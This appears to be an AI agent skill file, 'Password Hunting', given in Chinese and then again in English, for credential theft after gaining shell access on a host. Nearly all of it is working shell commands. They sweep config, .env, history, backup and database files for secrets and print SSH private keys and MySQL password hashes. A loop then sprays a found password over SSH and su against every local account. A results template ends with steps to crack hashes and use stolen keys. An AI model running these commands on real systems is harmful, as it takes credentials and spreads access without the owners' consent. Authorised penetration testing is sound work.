npx skills add https://github.com/allsmog/blackbox-claude-plugin --skill 'Password Hunting'
获取 shell 访问权限后立即使用,当需要:
# Sweep the web root, /opt, home directories and /etc for files that mention
# common credential keywords. -l prints file names only, -i ignores case, and
# each keyword's listing is capped at 20 paths.
for keyword in password passwd secret; do
  grep -rli "$keyword" /var/www /opt /home /etc 2>/dev/null | head -20
done
# Print the matching lines themselves for assignment-style entries such as
# password = '...' or password: "...". The output contains the secret values,
# so they end up in terminal scrollback and any session logging.
grep -rEi "password\s*[=:]\s*['\"]?[^'\"]+['\"]?" /var/www /opt /home 2>/dev/null
# Check config files directly. The two piped commands keep only lines that
# contain "pass" (case-insensitive); the .env files are printed in full.
# 2>/dev/null on cat hides errors for missing or unreadable paths.
cat /var/www/*/config*.php 2>/dev/null | grep -i pass
cat /var/www/*/.env 2>/dev/null
cat /opt/*/*.conf 2>/dev/null | grep -i pass
# PHP applications: list config, settings and database files under the web
# root whose contents mention "password" (file names only).
for php_pattern in "config*.php" "settings*.php" "database*.php"; do
  find /var/www -name "$php_pattern" -exec grep -li password {} \; 2>/dev/null
done
# Print the main configuration file of WordPress (wp-config.php) and Joomla
# (configuration.php) installs located one directory below the web root.
for cms_file in wp-config.php configuration.php; do
  cat /var/www/*/"$cms_file" 2>/dev/null
done
# Environment files: locate .env-style files anywhere on the filesystem.
for env_name in ".env" ".env.local" "*.env"; do
  find / -name "$env_name" 2>/dev/null
done
# Python: list settings.py / config.py files that mention "password".
for py_name in settings.py config.py; do
  find / -name "$py_name" -exec grep -li password {} \; 2>/dev/null
done
# Node.js: list config.json files that mention "password". xargs splits its
# input on whitespace, so paths containing spaces are not handled here.
find / -name "config.json" 2>/dev/null | xargs grep -l password 2>/dev/null
# Database configs. Any file below that the current (non-root) account can
# read is itself a permissions finding worth recording.
cat /etc/mysql/debian.cnf 2>/dev/null
cat /var/lib/mysql/mysql.cnf 2>/dev/null
# pg_hba.conf is PostgreSQL's host-based authentication rule file: it lists
# the auth method per database/user/address rather than passwords.
cat /etc/postgresql/*/main/pg_hba.conf 2>/dev/null
# Web servers: show only lines mentioning "password" in the enabled site configs
cat /etc/apache2/sites-enabled/* 2>/dev/null | grep -i password
cat /etc/nginx/sites-enabled/* 2>/dev/null | grep -i password
# FTP servers
cat /etc/vsftpd.conf 2>/dev/null
cat /opt/*/CrushFTP*/users/*/user.xml 2>/dev/null # CrushFTP per-user XML files
# Application servers: Tomcat's user and role definitions file
cat /opt/tomcat*/conf/tomcat-users.xml 2>/dev/null
# History files: print history lines that mention pass/secret/key/token, for
# example a password that was typed as a command-line argument.
cat ~/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
cat /home/*/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
# SSH: locate private keys named id_rsa, then print them. Printing a private
# key places the key material in terminal scrollback and session logs.
find /home -name "id_rsa" 2>/dev/null
find /root -name "id_rsa" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
# SSH client config: host aliases, user names and IdentityFile paths.
# ssh_config has no option for storing a password, so this shows which keys
# and hosts an account uses rather than passwords.
cat /home/*/.ssh/config 2>/dev/null
# RC files: list shell/tool rc files in home directories that mention "password"
grep -rli password /home/*/.*rc 2>/dev/null
cat /home/*/.netrc 2>/dev/null # .netrc holds machine/login/password entries (FTP and similar clients)
# SQLite databases: list files by extension. -o is a logical OR and the
# implicit -print applies to the whole expression.
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
# Extract users from SQLite. /path/to/database.db is a placeholder and the
# "users" table name is an assumption; .tables lists what actually exists.
sqlite3 /path/to/database.db "SELECT * FROM users;" 2>/dev/null
sqlite3 /path/to/database.db ".tables" 2>/dev/null
# MySQL (if we have creds): -p prompts for the password interactively.
# NOTE(review): the `password` column of mysql.user is not present on newer
# MySQL releases; confirm against the server version.
mysql -u root -p -e "SELECT user,password FROM mysql.user;"
# Look for database dump files (first 10 results)
find / -name "*.sql" 2>/dev/null | head -10
# Common backup extensions (first 20 results)
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" 2>/dev/null | head -20
# Config backups
find / -name "*.conf.bak" -o -name "*.php.bak" 2>/dev/null
# Zip/tar backups (first 10 results)
find / -name "*.zip" -o -name "*.tar.gz" 2>/dev/null | head -10
# Generic password patterns: print lines under the web root and /opt where a
# password-like field name is followed by ':' or '=' and a value.
for field in password passwd pwd; do
  grep -rEi "${field}\s*[:=]\s*['\"]?.+['\"]?" /var/www /opt 2>/dev/null
done
# Database connection strings: lines naming a database engine and "password"
# in either order.
for engine in mysql pgsql mongodb; do
  grep -rEi "${engine}.*password|password.*${engine}" /var/www /opt 2>/dev/null
done
# API keys/tokens: lines where the label is followed by ':' or '='.
for label in "api[_-]?key" token secret; do
  grep -rEi "${label}\s*[:=]" /var/www /opt 2>/dev/null
done
# Application-specific settings. These three commands do not redirect stderr,
# so a missing file produces an error message instead of silence.
# WordPress: database settings and the AUTH_/LOGGED_IN_/NONCE_ keys and salts
cat /var/www/*/wp-config.php | grep -E "DB_|AUTH_|LOGGED_IN_|NONCE_"
# .env: database, application, mail and AWS variables
cat /var/www/*/.env | grep -E "DB_|APP_|MAIL_|AWS_"
# settings.py: lines naming SECRET_KEY, DATABASE or PASSWORD
grep -E "SECRET_KEY|DATABASE|PASSWORD" /var/www/*/settings.py
# User configs with passwords
find /opt -path "*CrushFTP*" -name "user.xml" 2>/dev/null
cat /opt/crushftp/users/*/user.xml 2>/dev/null | grep -i password
当您找到一个密码时:
# Check whether a recovered password is reused by local accounts.
# "FoundPassword123" is a placeholder for the value that was found.
PASSWORD="FoundPassword123"
# User names (field 1) of /etc/passwd entries containing /bin/sh or /bin/bash.
USERS=$(cat /etc/passwd | grep -E "/bin/(ba)?sh" | cut -d: -f1)
# Test SSH: one login attempt per account against localhost, running `id` on
# success. Each failed attempt is recorded by sshd as an authentication
# failure and counts toward any account-lockout policy in force.
# sshpass -p puts the password on the command line, where it is visible in the
# process list while the command runs; StrictHostKeyChecking=no turns off
# host-key verification for the connection.
for user in $USERS; do
echo "Trying $user..."
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no $user@localhost id 2>/dev/null && echo "SUCCESS: $user"
done
# Test su: feed the same password to su on stdin, once per account. Failed
# attempts count as authentication failures here as well.
for user in $USERS; do
echo "$PASSWORD" | su - $user -c id 2>/dev/null && echo "SUCCESS: $user"
done
# 密码搜寻结果
## 找到的凭据
| 用户名 | 密码 | 来源 | 适用于 |
|----------|----------|--------|----------|
| admin | SuperSecret123 | /var/www/config.php | MySQL |
| ben | HouseH0ldings998 | /opt/app/.env | SSH, 本地 |
## 找到的 SSH 密钥
| 用户 | 位置 | 密码保护 |
|------|----------|-------------------|
| root | /root/.ssh/id_rsa | 否 |
| ben | /home/ben/.ssh/id_rsa | 是 |
## 数据库哈希值
| 用户名 | 哈希值 | 类型 |
|----------|------|------|
| admin | $2y$10$... | bcrypt |
## 后续步骤
1. 在 SSH 上测试找到的密码
2. 破解提取的哈希值
3. 使用 SSH 密钥进行访问
Use IMMEDIATELY after getting shell access when:
# Sweep the web root, /opt, home directories and /etc for files that mention
# common credential keywords. -l prints file names only, -i ignores case, and
# each keyword's listing is capped at 20 paths.
for keyword in password passwd secret; do
  grep -rli "$keyword" /var/www /opt /home /etc 2>/dev/null | head -20
done
# Print the matching lines themselves for assignment-style entries such as
# password = '...' or password: "...". The output contains the secret values,
# so they end up in terminal scrollback and any session logging.
grep -rEi "password\s*[=:]\s*['\"]?[^'\"]+['\"]?" /var/www /opt /home 2>/dev/null
# Check config files directly. The two piped commands keep only lines that
# contain "pass" (case-insensitive); the .env files are printed in full.
# 2>/dev/null on cat hides errors for missing or unreadable paths.
cat /var/www/*/config*.php 2>/dev/null | grep -i pass
cat /var/www/*/.env 2>/dev/null
cat /opt/*/*.conf 2>/dev/null | grep -i pass
# PHP applications: list config, settings and database files under the web
# root whose contents mention "password" (file names only).
for php_pattern in "config*.php" "settings*.php" "database*.php"; do
  find /var/www -name "$php_pattern" -exec grep -li password {} \; 2>/dev/null
done
# Print the main configuration file of WordPress (wp-config.php) and Joomla
# (configuration.php) installs located one directory below the web root.
for cms_file in wp-config.php configuration.php; do
  cat /var/www/*/"$cms_file" 2>/dev/null
done
# Environment files: locate .env-style files anywhere on the filesystem.
for env_name in ".env" ".env.local" "*.env"; do
  find / -name "$env_name" 2>/dev/null
done
# Python: list settings.py / config.py files that mention "password".
for py_name in settings.py config.py; do
  find / -name "$py_name" -exec grep -li password {} \; 2>/dev/null
done
# Node.js: list config.json files that mention "password". xargs splits its
# input on whitespace, so paths containing spaces are not handled here.
find / -name "config.json" 2>/dev/null | xargs grep -l password 2>/dev/null
# Database configs. Any file below that the current (non-root) account can
# read is itself a permissions finding worth recording.
cat /etc/mysql/debian.cnf 2>/dev/null
cat /var/lib/mysql/mysql.cnf 2>/dev/null
# pg_hba.conf is PostgreSQL's host-based authentication rule file: it lists
# the auth method per database/user/address rather than passwords.
cat /etc/postgresql/*/main/pg_hba.conf 2>/dev/null
# Web servers: show only lines mentioning "password" in the enabled site configs
cat /etc/apache2/sites-enabled/* 2>/dev/null | grep -i password
cat /etc/nginx/sites-enabled/* 2>/dev/null | grep -i password
# FTP servers
cat /etc/vsftpd.conf 2>/dev/null
cat /opt/*/CrushFTP*/users/*/user.xml 2>/dev/null # CrushFTP per-user XML files
# Application servers: Tomcat's user and role definitions file
cat /opt/tomcat*/conf/tomcat-users.xml 2>/dev/null
# History files: print history lines that mention pass/secret/key/token, for
# example a password that was typed as a command-line argument.
cat ~/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
cat /home/*/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
# SSH: locate private keys named id_rsa, then print them. Printing a private
# key places the key material in terminal scrollback and session logs.
find /home -name "id_rsa" 2>/dev/null
find /root -name "id_rsa" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
# SSH client config: host aliases, user names and IdentityFile paths.
# ssh_config has no option for storing a password, so this shows which keys
# and hosts an account uses rather than passwords.
cat /home/*/.ssh/config 2>/dev/null
# RC files: list shell/tool rc files in home directories that mention "password"
grep -rli password /home/*/.*rc 2>/dev/null
cat /home/*/.netrc 2>/dev/null # .netrc holds machine/login/password entries (FTP and similar clients)
# SQLite databases: list files by extension. -o is a logical OR and the
# implicit -print applies to the whole expression.
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
# Extract users from SQLite. /path/to/database.db is a placeholder and the
# "users" table name is an assumption; .tables lists what actually exists.
sqlite3 /path/to/database.db "SELECT * FROM users;" 2>/dev/null
sqlite3 /path/to/database.db ".tables" 2>/dev/null
# MySQL (if we have creds): -p prompts for the password interactively.
# NOTE(review): the `password` column of mysql.user is not present on newer
# MySQL releases; confirm against the server version.
mysql -u root -p -e "SELECT user,password FROM mysql.user;"
# Look for database dumps (first 10 results)
find / -name "*.sql" 2>/dev/null | head -10
# Common backup extensions (first 20 results)
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" 2>/dev/null | head -20
# Config backups
find / -name "*.conf.bak" -o -name "*.php.bak" 2>/dev/null
# Zip/tar backups (first 10 results)
find / -name "*.zip" -o -name "*.tar.gz" 2>/dev/null | head -10
# Generic password patterns: print lines under the web root and /opt where a
# password-like field name is followed by ':' or '=' and a value.
for field in password passwd pwd; do
  grep -rEi "${field}\s*[:=]\s*['\"]?.+['\"]?" /var/www /opt 2>/dev/null
done
# Database connection strings: lines naming a database engine and "password"
# in either order.
for engine in mysql pgsql mongodb; do
  grep -rEi "${engine}.*password|password.*${engine}" /var/www /opt 2>/dev/null
done
# API keys/tokens: lines where the label is followed by ':' or '='.
for label in "api[_-]?key" token secret; do
  grep -rEi "${label}\s*[:=]" /var/www /opt 2>/dev/null
done
# Application-specific settings. These three commands do not redirect stderr,
# so a missing file produces an error message instead of silence.
# WordPress: database settings and the AUTH_/LOGGED_IN_/NONCE_ keys and salts
cat /var/www/*/wp-config.php | grep -E "DB_|AUTH_|LOGGED_IN_|NONCE_"
# .env: database, application, mail and AWS variables
cat /var/www/*/.env | grep -E "DB_|APP_|MAIL_|AWS_"
# settings.py: lines naming SECRET_KEY, DATABASE or PASSWORD
grep -E "SECRET_KEY|DATABASE|PASSWORD" /var/www/*/settings.py
# User configs with passwords
find /opt -path "*CrushFTP*" -name "user.xml" 2>/dev/null
cat /opt/crushftp/users/*/user.xml 2>/dev/null | grep -i password
When you find a password:
# Check whether a recovered password is reused by local accounts.
# "FoundPassword123" is a placeholder for the value that was found.
PASSWORD="FoundPassword123"
# User names (field 1) of /etc/passwd entries containing /bin/sh or /bin/bash.
USERS=$(cat /etc/passwd | grep -E "/bin/(ba)?sh" | cut -d: -f1)
# Test SSH: one login attempt per account against localhost, running `id` on
# success. Each failed attempt is recorded by sshd as an authentication
# failure and counts toward any account-lockout policy in force.
# sshpass -p puts the password on the command line, where it is visible in the
# process list while the command runs; StrictHostKeyChecking=no turns off
# host-key verification for the connection.
for user in $USERS; do
echo "Trying $user..."
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no $user@localhost id 2>/dev/null && echo "SUCCESS: $user"
done
# Test su: feed the same password to su on stdin, once per account. Failed
# attempts count as authentication failures here as well.
for user in $USERS; do
echo "$PASSWORD" | su - $user -c id 2>/dev/null && echo "SUCCESS: $user"
done
# Password Hunt Results
## Credentials Found
| Username | Password | Source | Works On |
|----------|----------|--------|----------|
| admin | SuperSecret123 | /var/www/config.php | MySQL |
| ben | HouseH0ldings998 | /opt/app/.env | SSH, local |
## SSH Keys Found
| User | Location | Password Protected |
|------|----------|-------------------|
| root | /root/.ssh/id_rsa | No |
| ben | /home/ben/.ssh/id_rsa | Yes |
## Database Hashes
| Username | Hash | Type |
|----------|------|------|
| admin | $2y$10$... | bcrypt |
## Next Steps
1. Test found passwords on SSH
2. Crack extracted hashes
3. Use SSH keys for access